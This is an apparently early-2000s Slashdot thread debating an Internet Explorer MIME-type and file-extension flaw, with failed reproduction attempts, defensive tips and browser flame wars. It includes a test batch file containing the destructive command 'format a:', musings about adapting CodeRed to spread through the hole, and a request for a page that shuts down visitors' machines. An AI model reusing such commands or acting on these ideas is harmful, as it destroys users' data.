For a laugh check out another post on this thread by me about a friend of mine who did not have current definitions for his AV.
It's fourty below and I don't give a
Safe at last! Whew!
Not really, you still have to remove the Redmond Virus from your hard disk. For this, visit another site's list of download mirrors and be prepare to wait a little longer. Yes, Mozilla is included with your replacement OS.
I guess IE for Mac is already invulnerable.
Is Opera free software (that's free as in liberty, not free as in beer) yet? No? Then no thanks. I'd rather choose software that poses the least potential for biting me in the ass later on. That's free software.
Your computer is open if you stumble across a specially constructed site. If you browse /. the news, stock quotes etc. then you're prett much safe.
Wrong, if you have a gaping security hole on your computer, then you're vulnberable (open) even if no-one exploits the hole.
The story, as posted on /. has it right.
echo '[q]sa[ln0=aln80~Psnlbx]16isb572CCB9AE9DB03273snlbxq' |dc
Yes - it's the default setting for Opera. You have to specifically change it, and that just causes some pages to stop working.
What kind of steps can people use to protect themselves now
:)
This step and this, for instance
May we live long and die out
I have run into the same problem using Mozilla and K-Meleon. I love Mozilla for blocking popups, but prompting me to download a file that should be displayed is annoying. Try downloading a hotmail attachment somtime.
But its not as annoying as the moment of panic I get in MSIE when the computer appears to lock up and then I realize its just another popup or popunder.
Of course if MS would have left "browse in a new process" as an option without doing a registry hack....Grrrrr. Some day I'll get a job in a Non-MS workplace....
"God fights on the side with the best artillery." - Napoleon, Marshal of France - speaking truth to power
Please, Microsoft may have used some competitive pressure, by making IE easier to come by then anything else. But I have trouble blaming Netscape's demise on anyone but Netscape. 4.7 was a complete piece of shit, and Netscape put out some of the buggiest, crash prone, shit ever. That's why people switched to IE, that's why I switched to IE. Because Netscape, comparatively, was a piece of crap.
autopr0n is like, down and stuff.
lynx, links, etc. browsers rely on the extension to decide which program to fork to view/run/listen to the file. Even if the browser is somehow fooled into thinking that an executable is a .jpg, it will call an *image viewer*, not execute the program. The worst thing to happen will be that the file will be useless.
MDI annoys the hell out of me, to be honest.
autopr0n is like, down and stuff.
So, mandolin, please shut the fuck up, and take your drivel back to Redmond. We don't need you here.
> Pynnonen reported the IE vulnerability to
> Microsoft on Nov. 19
That's about 3 weeks ago. Microsoft has to reproduce the bug, fix it, test the fix, test the fix more, publish the fix. 3 weeks are not *that* much.
I bet that many open-source software has security holes open longer than that.
The next gen of virus should spread by exploiting all of MS lovely holes. Modifing CodeRed to use this exploit would be very tasty. You could have 2 excellent attack methods: attacking by scanning for open IIS servers,once found you could spread to anyone who downloads from the infected server. one downloaded you could either email yourself out or start scanning from the download machine.
There are so many DIFFERNT holes in all of the connected products the virus's life cycle could be spread over many different stages. Let the fun begin! Thank you MS!
I mod everyone down who says "I'll get modded down for this." I hate to disappoint.
I thought it was a kind of UI standard that the middle button on a mouse opens a new window when you use it in a web browser. Konqueror, Mozilla and Netscape all do this. If your pointer is over a hyperlink at the time, then it will open the linked document in a new window. I was under the impression that Opera did this too. At leas on my system, when I want to scroll, I use the scroll wheel on my mouse (which can also click and doubles as the "middle" button).
I'm using a MS Intellimouse Explorer and RedHat 7.2 if that's of any relevance.
You mention that your browser scrolls way too fast. I don't know about browsing in the Windows world, but I've realised there's a lack of ability to control how fast the wheel causes pages to scroll and different apps seem to choose by themselves (ranging from scrolling a couple of lines at a time to scrolling a page at a time). As well as choosing a standard for what the middle button does (i was sure there alrady was one) I think the community (develpers I mean) need to agree on some way of deciding what the wheel does (on mice that have one).
Follow me
upon first reading michael's post, i thought this wouldn't work, because ie has that annoying behavior of examining the first bytes of file to determine its mime type, sort of like apache's mime-magic module. and then ie in 5.5sp1 had to go and break the content-dispostion header, but i digress.
.bat
.txt
.txt
.bat
.exe renamed to b.txt
.bat file as text in the browser.
.txt, ie prompts to open or save, defaulting to save. selecting open opens the binary file in notepad.
anyway, i tried to recreate this bug, with no luck. maybe someone can explain what i'm doing wrong, assuming this is a valid hole in i.e.:
server: apache 2.0.28 beta for win32
client: ie 5.5 sp2 (not sure if it's stock sp2 or has a hotfix on top of sp2. there's some Qxxxxxx following in the "about" box)
in httpd.conf, created the following:
<Directory "c:/foo/bar">
#AddType audio/x-wav
#AddType audio/x-wav
AddType application/octet-stream
AddType application/octet-stream
</Directory>
created two files:
a.bat:
@echo off
format a:
b.txt:
this is a just an
ie renders the
in the case of the
changing the mime-type to audio-x-wav just renders the files as text in the browser (no prompting in the case of the txt/exe).
so what's the big deal?
I really don't care about the security issue (well I do but that's not the point).
The whole download file process in IE is screwed up.
Say you want to allow users to download a generated file that is to be saved as "report.zip". The good way to do it is to have a cgi or asp or whatever generate the file on the fly and send them to the user.
Now HTTP has default headers for this exactly this. Guess which browser doesn't do what you tell it and has a different behaviour for each and every version.
I develop software for a living...
When I serve this URL up to IE 6 under Windows 2000 (maybe other versions; that was the only Windows IE I tried)
Parse error...
These 2 lines are soooooo incompatible as to be ridiculous.
You *only* test on beta software (IE6) ?!?
And you do this for a living?!?
This article is complete crap. I tested it, myself, and it simply isn't true.
.exe files are now sent as text/plain. When I type in the URL http://autopr0n.com/cliplay.exe. Internet Explorer does indeed handle it the same way it would handle executable content. It asks if i would like to download or execute it Hardly much of a fucking security issue if you ask me, especially considering the fact that it would behave in the exact same manner if the mime type was application/octet-stream or whatever the default value was.
A quick edit of my mime.types file in apache, and
In other words, the meme type has no effect on how IE handles executable content. But if this were a problem, it would mean that IE automatically ran all executable content it received, including stuff with the proper mime header. You would know this two if you stopped to think about it for half a second.
Oh, and mozilla does the exact same thing (well, it doesn't give you the option to execute from the cache like IE does). At least in the somewhat older version I have.
You guys couldn't take five fucking minutes to test this before posting this crap story?
Oh wait, it was from michael... nevermind. Anyone else remember the united devices fiasco a while back where michael attacked some anti-cancer distributed software because it was being funded by 'corporations' (Intel) who would of course patent everything and make money off everyone's spare cycles (despite the fact that it was clearly stated on the site that it wouldn't be). Couldn't be bothered to check sources or verify anything before posting a story to millions. And it's the same here. Way to fucking go Mr. 'journalist'
autopr0n is like, down and stuff.
For all the fanboys that scream out that Opera is better than IE (and it is, I love it too) - in this case it is vulnerable too, as this link proves. The file save dialogue will show the text.txt filename, but if you select to open it directly, it will run.
Opera 6.0 is not vulnerable - but take note - even though it is much better and has less exploits than IE, it's still not completely free of them. (On the other hand, the only secure applications are those on an unpowered computer, or a program of 'Hello World' complexity)
What happens if, you send an .exe file with an audio/x-wav mime type is that IE will handel it like any other .exe file it runs across. it'll give you the option to save or run it, as an EXE. in other words, the mime type is pretty much ignored.
autopr0n is like, down and stuff.
If you try that on a windows machine, make sure you don't have .bat files set as server side exicutables.
you'd be just as likely to kill your server's hard drive while the user got a nice web page that said "please wait, unpacking..."
autopr0n is like, down and stuff.
On Windows, create a separate user account for the browser with no access to any important files, and use "runas" to start the browser.
For IE:
%windir%\System32\runas.exe /user:ie /profile "c:\program files\internet explorer\iexplore.exe"
For Mozilla:
C:\WINNT\system32\runas.exe /user:mozilla /profile C:\Mozilla\bin\mozilla.exe
"Slapping people is fun." - Starla Grady
Nope. Tried it on IE6.0 and IE informs me that the file is of an unknown format or corrupted.
---
I didn't want to leave this space blank.
URL: http://autopr0n.com/cliplay.exe
Mime type: audio/x-wav
Action: Opens up media player and says "cannot play back, format not supported"
In other words, you're completely full of shit. And so is the person who posted this bogus artical in the first place.
autopr0n is like, down and stuff.
>Actually, Slashdot has way more Windows apologizers than it used to. And this is a bad thing.
/.er with an agenda to push. I've said it before, I'll say it again. I don't come here to fucking push a one-sided agenda, and I think that the so-called apologists are just geeks looking for some JOURNALISTIC INTEGRITY. If the low UIDs and zealots want to keep the blinders on and circle jerk all the way to non-MS heaven so be it. This board seems to be evolving away from that, thank god. There are some of us who recognise flaws and strengths with many different apps and OSes and are WILLING TO TELL THE FUCKING TRUTH.
Apologists? Get stuffed. How about rational and clear-headed. Like being able to spot reverse FUD in action. Again, you are another
Yes this "feature" is a security risk. Yes it is serious. And YES, the tone of Michael's comments border on tabloidism. And YES, I think it is appropriate that the patrons of this board be able to point that fact out and demand a little bit of non-partisan behaviour from the editors.
Wow. Never expected this reaction on slashdot. :)
Error: PANTS NOT FOUND. Press <F1> to continue.
"The patch for Internet Explorer (IE) is currently in testing and could be released soon, according to Jouko Pynnonen, a security researcher with Finland's Oy Online Solutions. Pynnonen reported the IE vulnerability to Microsoft on Nov. 19 and recently tested the software fix at the company's request. "
Correct me if I am wrong, but that doesn't sound like M$ refusing to fix the bug or not fixing it to me...
People should not be afraid of their governments - Governments should be afraid of their people.
Oops sorry without the link this does look like a troll :-(
/. story
Obviously some of you didnt read that
"What kind of steps can people use to protect themselves now"
Never ever choose "open file from its current location" no matter what you think the name is, unless you are willing to give trust the site with any data on your system.
Of course, since no data has been released, I'm not sure this fixes all the problems, but from the description in the article it would. (Somewhere above someone says that IE executes certain MIME types, namely audio, automatically. However, AFAIK, in that case it would attempt to use the correct plugin, and this vunerability would not apply).
I don't think this will do major damage. There seems to be a real easy workaround. I think michael is blowing things a bit out of proportion in his article. On the other hand, I do agree that this is a perfect example of how Microsoft's refusal to divulge information has nothing to do with protecting customers. Sure there is no "patch" for the vunerability yet. But NONE IS NEEDED! In no case is any legitimate usage made immpossible (check me on this--Microsoft may have implemented some stupid "copy protection" where you can only open a file but not save it). It is only made less convienent. Users can be protected the instant they see the alert, Black Hats will take time to set up an exploit even if tools are made easily available.
URL: http://autopr0n.com/random.txt.
.exe file, rename it to .txt, and then send it as application/octet-stream IE will prompt to download/open, and if you click open it will open it in notepad. For example
Mime type: application/octet-stream
Actual type: text file
Action: shows up in IE as a regular text file.
Now, when you take a real
URL: http://autopr0n.com/random.txt.
Mime type: application/octet-stream
Actual type: win32 executable (shows you how long your computer has been running, actually)
autopr0n is like, down and stuff.
The grand parent post is incorrect, and the one I'm replying to is correct.
Mod this one up at least to the same rating as "Intergating Web Browser and File Browser"
-- don't discount flying pigs until you have good air defense
All you need to do is find a country where the EULA cant take away the right of negligence
Wouldn't it be nice if schools got all the money they wanted and the army had to hold jumble sales for guns
Sorry, the second URL should be http://autopr0n.com/uptime.txt
autopr0n is like, down and stuff.
I don't really think the EEF is going to go around lobbying for more restrictions on programmers.
autopr0n is like, down and stuff.
First of all: Test what? Details of the bug have not been released. So only your own arrogance validates your "test" of this bug.
Second of all: The harm in this bug lies in IE asking the user if he wants to open a file of one type (i.e. Text, which is safe), and then proceeding to run maliscious code.
Now this bug may not pose any threat to reasonably intelligent people, but I think we all know that the internet (and IE users even moreso) is not comprised solely of reasonably intelligent people. Hell, it might even get me, if I was an IE user. Why waste time/space downloading a txt file when I can open it in the browser? Trust issues? Who worries about whether or not to trust a txt file? Text is harmless, as long as it's treated as text.
Nothing to see here. Move along.
Sheesh! Stop already.
The problem here arises from the fact that Windows allows more than one '.' in a filename, but will only display one. Therefore, a malicious webmaster can name a file "foo.pdf.exe" and Windows Open/Save dialog will only display foo.pdf.
Windows, by default, does not show the actual file extension. The 'actual' file extension is the last one. You can have as many '.'s in your file name, and the last one won't be shown if file extensions are turned off (not 'just one')
If you turn file extensions on its not a problem.
*sigh* is it to much to ask that people actually know what they're talking about?
autopr0n is like, down and stuff.
That's true, but implied warranties make the assumption that the product is going to be as good as others on the market. And we all know, or at least have our stereotypes about the software market.
So in the end, software has no implied warranties, because no one can reasonably expect that it won't be bug/security issue free.
autopr0n is like, down and stuff.
Warning to consumers: Although it sounds like a good thing, "Standards-compliant", when used in the context of Mozilla, is a euphemism for "Fails to render a significant proportion of popular websites".
-- the most controversial site on the Web
Let me say I will be one of the first to jump on the "I Hate Microsoft" wagons. But this article is just plain wrong, as in inaccurate.
The first paragraph of the referenced story talks about how they are currently in testing for this security hole. Whereas, the poster is stating that Microsoft has no specific designs on when this will ever get fixed.
Inaccurate, Fanatical Extremism like this is only going to hurt Open Source, Slashdot, and those associated with it. While Microsoft may be wrong in this case. It doesn't do us any good to exhibit poor sportsmanship. Leave that for the politicians
"the beta test"
I agree it is a bug in the OS. It is Matrox video cards. The problem is that, in some cases, Opera takes memory and doesn't give it back. There is a huge memory leak somewhere, it seems, that has been there for more than a year.
Bush's education improvements were
sent an EXE as an audio file. It was automaticaly downloaded and I got an error message saying that it was an invalid audio file.
.txt file with a win32 program file in it (renamed .exe) and it will ask you if you want to open or save or whatever. If you click 'open' it opens in notepad. Weirdly, a regular text file sent with a mime type saying that it's an exicutable will just show up as a regular text file.
Sending an
I'm using IE6, though. And some comments seem to be saying this only affects IE5. So who knows. I've posted URLs for my expirements on slashdot,here, here, and here
autopr0n is like, down and stuff.
First of all: Test what? Details of the bug have not been released. So only your own arrogance validates your "test" of this bug.
.exe with some other mime type with an external viewer, and having an .exe renamed named to .txt and sent as an executable). The program never ran.
What details are you talking about. They are all spelled out clearly in the article. Change the mime type of an EXE and it gets run. Only it doesn't. I've tried it both ways (having an
autopr0n is like, down and stuff.
Not entirely; as I understand it, Konqueror and Explorer work in pretty-much the same way, eg the HTML redering is taken care of by a seperate library/DLL, that is available for use by any application.
When I set IE to warn about cookies once, SQL Server Enterprise Manager later warned me about a cookie when I was browsing the db I was adminstering (this was about 2 years ago now).
Cheers,
Tim
It's official. Most of you are morons.
Actually this is probably a symptom of the most irritating thing about IE from a development standpoint. With NS or anything else you can have many versions installed on one machine, with IE I haven't found a way of installing multiple versions (I don't believe there is one due to integration with the OS) hence you need multiple systems to test with multiple browsers before you even start testing with multiple OS.
I've had a similar problem trying to pipe a pdf through an access rights system, the fix was to hack an extra parameter onto the end of the URL so you end up with something like
http://abc.def.ghi/dostuff?zxy=123&x=x.pdf
which is horrible, but works.
Cars' steering wheels are also free when you buy a car. Lets remove them.
Nah, bad example.
A MS car would have somehow linked the stero system to the car's engine, so if you remove the stereo system the car would not start.Needless to say the MS stereo plays only copy protected, MS sanctioned square CDs and the only way to use another stereo is to install it somewhere else in the car. Much better analogy.
IANAL but write like a drunk one.
I can't help but wonder if we'd have a software industry left if developers became completely liable to the individual for lousy products. How does one prove that his program fails because Windows sucks? How does Microsoft prove that Windows sucks because hardware manufacturers write crappy drivers for inconsistent peripheral interfaces? How could Free Software survive in an environment where it is still impossible to write once, run anywhere?
There is a middle ground, I'm sure, but we're not going to get there as long as software developers are the only ones writing the rules regarding liability for faulty software development.
Try not. Do or do not, there is no try.
-- Dr. Spock, stardate 2822-3.
"Microsoft doesn't audit their software because *IT ISN'T COST EFFECTIVE YET*. Not until people demand security will MS start doing this. It hasn't happened yet."
I agree that Microsoft does not audit their software. That seems obvious.
Yes, Microsoft has more to audit, but they have more full-time programmers, too.
What you are basically saying is that Microsoft doesn't care about being trustworthy, they care only about money.
I never would have guessed that Open Source software would replace the software from a giant company, but that is will continue happening if Microsoft does not care for its customers.
Bush's education improvements were
Courtasy of The Register
The article tells you how to download and install a DLL that turns off HTML in M$ Lookout
Anyone quoted by a reporter knows how little they understand
Don't believe what you read is the truth.
with IE I haven't found a way of installing multiple versions
Ouch!
I usually test it with NS and IE (various versions) on a Mac and NS and IE on the other monitor under VirtualPC under a few versions of windows.
I ask friends running a whole grip of different combos to look at it too before I release it.
IE 6 is NOT beta software, and if you took your head out of your arse, you would know it.
So, accordnig to the slashdot people, I should switch to Netscape/mozilla. another wanna-be monopolist. Guess I'll have to take this for granted:
.lock file found ANd cannot locate server register)
.. which made me really really angry once, resulting in a thrashed keyboard. Can I get a refund on that?
- Default startup with TWO error msgboxen !! (nerdscape
- Mysteriously disappears from the desktop from time to time -though ps reveals its still running
- If a page is not found, the error is 'cannot locate keyword.nerdscape.com'
talking about crappy browsers!! I found IE on solaris more stable than nerdscape (except for outlook)
BTW I still have a three-year old html script that will instantly crash any netscape browser up to the latest mozilla. I'll be working on the 'vanished netscape instance exploit' from now on!!
It's been released for what, like a week?
That *is* still beta regardless if it's from MS or not.
I had a similar problem once, when I had to make a CGI that would send back a spreadsheet to be passed off to the right application from either Netscape or IE. The eventual solution was to change the content-type slightly for each browser, and for IE to append a fake parameter with the right extension so IE would open it correctly.
It was a workaround for IE, really, Netscape handled it fine with the correct content-type. IE didn't handle it correctly unless you munged the content-type AND added that fake extension...
- Give a man a fire and he's warm for a day, but set him on fire and he's warm for the rest of his life.
Well why doesnt someone setup a page that uses this exploit... hmmm... :
Difficult bits:
- gain access to msn.com
Easy bit:
- Code a virus (some may say saviour?) that:
uninstalls IE
installs Mozilla
sets slashdot as homepage.
Hmm now im sure M$ would fix the bug quick enough if that was done!
The effects of joining #*,0 are server side. Client independant.
This is a great quote! Mod it up please!
If I were M$ I wouldn't write a patch either.
I would write a new and more expensive OS without the 'feature'. Thereby forsing all the users to upgrade.
And actually, it might be cheeper for M$ to do instead of writing a patch.
Privacy is terrorism.
It's been out for months.
This is all so confusing. Is this the same as the Microsoft bug(s) that I read about last week? Or is this a spiffy brand new Microsoft bug?
This brings security through obscurity to a new level! Not only are all of the bugs obscure, but there are so impossibly many of them lately, that no mere mortal can keep track any more. Is there a patch for this or was it applied already last week? Is this one brand new and is there a patch hiding somewhere in MSN that nobody knows about yet? What is about to come next week? Or has Microsoft just given up!?
Did you consider that maybe he was testing & debugging small pieces (maybe to make sure the app logic was right?) before testing everything more thoroughly?
I have been stung by this too.
The MS Update page downloads a CSV dataset and renders it. The MS javascript on that page would get confused by the fact that the CSV data that I was downloading and was marked as text/html would be modified (validly) by our application. Since we added HTML to the CSV data since we treated it as text/html it would get confused.
I have an outstanding support request with MS, but they tried to convince me that since under IE it works normally it was not a bug.
I have a write up at http://www.ticons.com.au/~mtippett/msdownload.txt if anyone wants to annoy microsoft with their own bugs!
We lost a customer because of it, so give them hell!
..just felt like commenting on your sig. This may not save time with certain harddisks; the firmware on some disks tries to read the partition table when it powers up. The command above would fuck up the partition table and will cause weird errors. mkreiserfs /dev/hda? may save some more time:)
I use balsa for email.
I use gmc (not nautilus yet) for file browsing.
Why do these three tasks always have to be made into one huge application that has to take over your computer?
Man, I'm sitting in my high schoo, right now using IE 5.0 because that's what the computers in my school shipped with, and our one computer tech doesn't have the time to install a new browser on all the comps, and train the clueless teachers and students in their use. And frankly, why should my school have to lose security because of this? It's microsoft's job to ship a quality product (in theory), and they aren't doing that. IT isn't the victim's fault.
I'm the stranger...posting to
I would like to demonstrate this. Could somone write a HTML document for me this will do something harmless yet dramatic, like shut down the computer? Then email me the link. This way we can all use your HTML to show people what this bug does. A picture is worth a thousand words, but a demonstration HTML would be worth a bunch more Micro$oft systems converted to Linux or Unix.
. Quit playing Monopoly with Bill. Switch to one of many non-Microsoft products today.
I have been unable to get this to work as described in the article, or by the other attempts posted so far. The closest I have come is to create a Redirect or Rewrite rule that takes a request for a *.txt file and points it to a .bat file (thereby fullfilling the "text" requirement"), which is then soft linked to your malicious executable. This still displays the file's name however. And the dialogue asks you to "run" this program. The extra step of the soft-link bypasses a warning about running the file; if the redirect went straight to the .exe, the browser will complain about security.
.exe file to .txt, that just spits binary data at you in Notepad.
/.ers would have hit on it by now.
Either way, this is entirely server-side. The article states that simple HTML can pull it off. I am wondering if that is just a smoke screen.
- I have tried renaming an
- I tried a cgi (source is here).
Now, this time the dialogue displays the requested file (.cgi) instead of the executable filename (not a redirect). However, you are then prompted to "choose a program to run this..." which means that the requested file has to have an executable extension, or a known extension. Wav, mp3, mpg won't work as the format is obviously invalid.
3) I tried messing with the mime.types in Apache, various soft links and combos of all 3 methods. Basically I fail to see how standard HTML without any server-side config or scripting can fool the browser or get it to exec code unwillingly, as described in the article.
Maybe if I renamed the file to mayIhaveyouradvice.txt.pif or something, but the extension IS displayed to the user. Maybe the average user doesnt pay attention, but its kind of hard to miss.
Obviously they have ommitted something crucial because (my box - W2K, IE 5.5 SP2) this "bug" is not happening, and it's not happening for other people too. If this is so easy to implement in palin HTML and would affect "millions" then I think other
Microsoft has long tried to subvert MIME. In particular, as noted, MIME type is used to determine how to handle a document or attachment, but extension is used to actually handle it. For kicks, try opening an mime type AUDIO/basic document. The most basic possible audio encoding pulls up an error message.
--G
I think you missed just one little thing in this particular example.
The original article clearly states that people have been very secretive about the details. For example, it says that the details weren't mailed to Bugtraq at one point, and also that the select few who were given a demo apparently all signed NDAs first.
What I'd like to know is, how is michael getting all the "inside info" he'd need to justify his comments? What is his source? Unless he's got information he didn't mention, his article appears to be nothing but anti-MS FUD. If he does have that information, why didn't he post it, on a board as skeptical as Slashdot?
If you disagree, post your argument. (-1, Overrated) isn't your personal censorship tool for views you don't like.
"Now Microsoft has a problem. Because they chose to ignore the standard for handling downloaded files, Microsoft has painted themselves into a corner."
I think you guys got this backwards. It seems to me that everyone else is going against the standard by not doing it the Microsoft way. I mean, these guys embrace and extend! Everyone else is just sticking with the old standards, while Microsoft is blazing new ones 8^}
"Microsoft
Guns don't kill people; Physics kills people! - John Lithgow as Dick Solomon on Third Rock From The Sun
Michael :
>Type may be innocuous, but the extension says "execute me", so when
>the "integrated" IE engine gets ahold of it, the malicious content
>is automatically executed.
>If you routinely browse with Internet Explorer or read mail with
>Outlook, keep in mind that any web page you visit or any email you
>open can take over your computer, steal sensitive files, destroy
>your machine, anything.
I like Slashdot lots, and read it pretty much every time I have net access (most work days +).
Still, it saddens me that poorly considered, or even deliberately missleading rants like this still slip through as editorial content.
For this item : 2/10, must try harder.
Simon Hibbs
I think this is the same flaw they actually patched on the Mac OS X version of IE...
Dang, wrong OS.
Vad things happen to stupid people all the time, just check out rotten.com.
If you think it's normal to blindly click "ok" on that dialog that comes up asking you to either download or execute something, then it's going to happen to you too.
...and maybe after you get ripped by a virus or some other malicious code you'll learn your lesson.
I think it's funny that the people who think this is a valid article are the same ones bashing the lion and lamb garbage...it's the same damn thing.
second society
I use Opera and sometimes Mozilla. I have both set to identify as "MSIE 5.0" so I can go to those "Designed for Microsoft only" sites. Anyway, I am sure that this type of thing throws off the stats a bit, doesn't it?
If somebody wants to sue, they'll contact a real lawyer and be advised from there.
God I hate idiots like glrotate.
Is IE. To say it's anything else is short sighted and borders on tunnel vision.
Using NT4/IE5 and it tried to open with WinZip as it normally would have a ZIP file. Except, of course, WinZip couldn't read it. Your file never got executed.
You can accomplish anything you set your mind to. The impossible just takes a little longer.
By "completely open" they mean you have to click on an EXE, download it, and choose to open it! WOW what a vulernability!!! OH NO! Opera and Mozilla are also vulernable!!! Ye gods what do we do now?!
Prevent linux based DDOS's!
http://linux.denialofservice.org/
So is this worse than the Linux wu_ftp bug that was hidden by obscurity?
Seems like that was worse since the exploit didn't require user assistance.
Thanks to Red Hat though for telling us so we can patch our machines. Too bad the GPL public review didn't catch that problem for so long. Ditto for Bind, SendMail...
this is not a sig
I have to use IE at work. There is absolutely no alternative.
The proxy software that was recently put in place uses Windows Authentication to let you through. Basically this entails logging into the proxy using your NT userid/password - all of which is sent automagically by IE. Without this the proxy won't let you through, not even for DNS.
So no, I don't have a choice.
What really sucks is that because of this proxy, there's no ways out of the network either. If I want to telnet to a box out on the net, I can't do it - even if the box has sshd listening on port 80, 119, etc. putty can't connect because it can't get through the proxy.
who's the moderator who called the original post "flaimbait"?
That was a valid response. He likes Opera... hell, I like Opera. And he's correct that the Opera UI with the gesture movements gets addictive. I'll hop on a computer using IE and I find myself trying to go back into history using the right click gesture method.
Opera is a great browser (I personally prefer 5 instead of 6).
Someone mod the parent (or mine to get some attention) up. Mod me down for being an ass if you want but moderation like that, on a valid post is uncalled for.
www.slightlycrewed.com - Because aren't we all?
Staying off the security vulnerability side of things, IE's non-conformance to the standard way of determining file type has irritated me for some time. Here's why:
The HTTP standards dictate that the Content-type: header contains the MIME type of the data which follows. Netscape accepts this; any standards compliant browser does this. IE, however, looks at the filename extension (and even the data itself) and makes decisions based on that.
This means that if I write some HTML, put it in a file called "text.html", then configure my browser to serve it with "content-type: text/plain", the right thing for a browser to do would be to display the HTML source as text. Some versions of IE think they're far too clever to fall for that one, and just render it as HTML anyway.
(1): What if I *want* to read the HTML source?
But more importantly than (1), I've seen proper production servers misconfigured in this way -- don't ask me why, so HTML content is sent with the wrong Content-type header. If the site is tested with IE only, everything will appear to be fine; only when you try and browse the site with another browser does the fault show up.
Now, what's a non-technical web user going to think when they see this? Are they going to think "Hmm, the server is set up wrong"? No, if it works in IE but not in Netscape, they're going to think "Netscape sucks!", and merrily continue using IE.
This despite the fact that IE is the one that's behaving wrongly.
I won't go as far as to suggest that this behaviour was put in as a deliberate ploy, but if someone else wanted to, I wouldn't argue with them...
and how is this patch going to get on people's machines the don't know how to install a friggin operating system? they just double-click on the blue "e" on the desktop and type where they want to go - presto after a few minutes of dialing the page shows up. patches are great for people who are aware enough. nimbda, code red, etc all had patches BEFORE or just shortly after the virus hit. why did it then infect tons of computers, annoy almost every single web server log file, and contine for months? m$ software is intended for an audience of people who don't know jack about computers, and in that respect they should be held legally and financially obligated to provide bullet-proof software. NN and others are intended for those who know better so should be expempt. any other industry which identifies a bug in it's product issues a public recall of the product to correct the problem (say a finds that it had a line of DVD's that the laser was set too high at the factory, those would be recalled yesterday)
File extensions seem to me to be a safer way to manage filetypes - on any Mac OS prior to X all you had to do to fool a user into running a spoofed program was to change the filename extension and icon (say, make an application with a .jpg extension and a quicktime image file icon). The os runs the file based on the actual file type and creator codes when it is double-clicked, and those codes are typically invisible to the user, so someone could very easily open a malicious program instead of, say, some downloaded pr0n.
.jpg will always be opened as a .jpg, even if its just a renamed .exe
At least with file extensions as the absolute identification of file type you can't be tricked (ignoring the method discussed in this article), and a
You may be able to make IE behave better by tagging a Content-Disposition header along in your HTTP response.
t xt).
:(
Its not in the HTTP spec, but is a proper MIME header (http://www.oac.uci.edu/indiv/ehood/MIME/rfc2183.
IE sometimes takes note of Content-Disposition's 'filename' parameter to figure out what extension jiggery-pokery it should call.
I say sometimes, because you can still run up against IE deciding that the first few hundred bytes of your file look like HTML so *obviously* the file is html, regardless of content-type, content-disposition, filename and untold sacrifices to the gods *sob!*
v
Realize that IE is insecure and start moving everything that matters out of reach. It's not like the patch for this this will fix all the yet to be discovered holes. Cheap trick is Find all the *script* thingees and delete/change their names. Changing names is probably better just in case someone really needs the function.
It may not be totally correct, but we all love to bash Microsoft. I would much rather read a completely wrong article about how crap Microsoft is, than a technically correct piece of MS PR about how they give money to lots of poor kids.
This comment does not represent the views or opinions of the user.
You *only* test on beta software (IE6) ?!?
And you do this for a living?!?
Of course not, you dimwit. It goes like this:
1. Implement a feature.
2. Test it on my workstation (Win2000, IE6)
3. Shit, there's a bug.
4. Fix the bug.
5. Test it on my workstation-- better now.
6. Submit change to QA for "real" testing.
Sheesh.
If you routinely browse with Internet Explorer or read mail with Outlook, keep in mind that any web page you visit or any email you open can take over your computer, steal sensitive files, destroy your machine, anything. This has been true for at least two and half years
Actually, this has been true since the first personal PC was put on the market, probably longer.
Once again, I am forced to point out the fact that it is an uneducated user who will cause the comprimise of the system. Personally, I NEVER "Open file from location". You never know what it is that you are downloading, so I always save it to disk first, and then examine it.
Any user who "Opens from location" without knowing for a fact what the file is, and that the site can be trusted, is acting stupidly.
Hmmm... Also, someone can use any web page you visit or any email you open can take over your computer, steal sensitive files, destroy your machine, anything ? Really, they can send the "Overload CPU" command and cook my processor? (Must be a linux command, my Win2K machine doesn't have it.) They can give me Anthrax? "Oh, no! Not the Thrax!" (-Butters, South Park) That "anything" is a little broad, don't you think?
Come on guys, I would expect this in the Enquirer, but not on /.
"Da ist ein Technölüst in mein Unterpanten!"
The deal is that you have a file ending in ".EML" with some MIME trickery in it, served up by any HTTP server. IE thinks it's an e-mail message and unpacks it. Inside is an executable (name ending with
The magic MIME trickery looks like this:
I have mod points today but I've just gotta post here. In the interests of full disclosure, I run Windows 2000 Server on my main development box and Windows XP Pro on my personal/multimedia box. I'm quite pleased with both. I also run RedHat and Slackware distros at various client sites as gateways, mail and web servers, etc. Best tool for the job, right?
Anyway, the point is, I don't (nor do my clients) surf as root/administrator. If we remember our lessons from "Computing 101" we run our day to day tasks as a regular user with the most restrictive set of permissions that allow us to do our jobs effectively. For the vast majority of these locally exploitable holes (worms, viruses, etc.) we can only damage our personal documents (which are backed up periodically and stored offline).
I'm not gonna take sides in the great "Microsoft is evil" debate today. I just hope more people will follow my lead and remember the basics.
BRENT ROCKWOOD, EST'd 1975
It really is hard for them. Older teachers in particular like the computer to look the same every time they use it, or they get confused. When I worked at my high school over the summer, I was told repeatedly not to allow any variation in desktop performance, so as not to confuse teachers or students. When you spend a lot of time of /., it becomes hard to believe, but a lot of people are simply not computer literate at all.
I'm the stranger...posting to
I have worked with several sites that pass files through CGI scripts to the user. Because all the web masters I have worked with are from a unix background, we've never cared about the extension. Files over the web should be passed and parsed by content-type, right?
There has been bug after bug dealing with content-type and extension in Internet Explorer. They PRE-DATE the fuller integration of IE into the operating system, although that integration worsened them. Every time a problem is reported to Microsoft, they fix the specific problem, not the underlying problem. Thus, you can change your tactics a little and create another "exploit".
I'm not at all surprised that a destructive exploit has been created. Most iterations of the problem that I've experienced have come from attempts to correctly serve valid data to IE users--in most of those cases, the browser was simply unable to correctly identify/render the files. I could see possibilities for destructive exploits, but because my field is communications, not white hatting, I really wasn't in a [mental/academic] place to experiement with them. Unless Microsoft fixes the UNDERLYING PROBLEM, which allows Internet Explorer to incorrectly interprete by extension in some cases thus ignoring content-type, they are going to continue to see exploits. Even I know that the mixture of two standards is far worse than following either one or the other--and opens the program to far many more exploits. Why can't Microsoft learn that?
Geez, Michael, wth is your problem? All your articles are either wrong or have so much FUD in them it's not funny.
IE6 is a big junk anyways. I completely gave up on it.
Even though I'm running XP, it forced me to get Netscape and forunatley for me this issue won't affect me.
They constantly create security holes in there products which could allow terrorists to disrupt American business. And, as we all know "if you're not against the terrorists, you're with them". Therefore, MS should be prosecuted under anti-terrorism statutes for this - let's see if that works better than the anti-monopoly statutes.
I also don't think that donating a lot of terrorist-aiding computers to American schools is going to help them much, either.
Clue me in on a few things, monkeyboy Michael:
1.) Did you bother to test this "flaw"?
2.) Did you bother to get independent verification the "flaw" exists, and can be exploited?
3.) Did you bother to search for any evidence that the "flaw" has been, or is being, exploited?
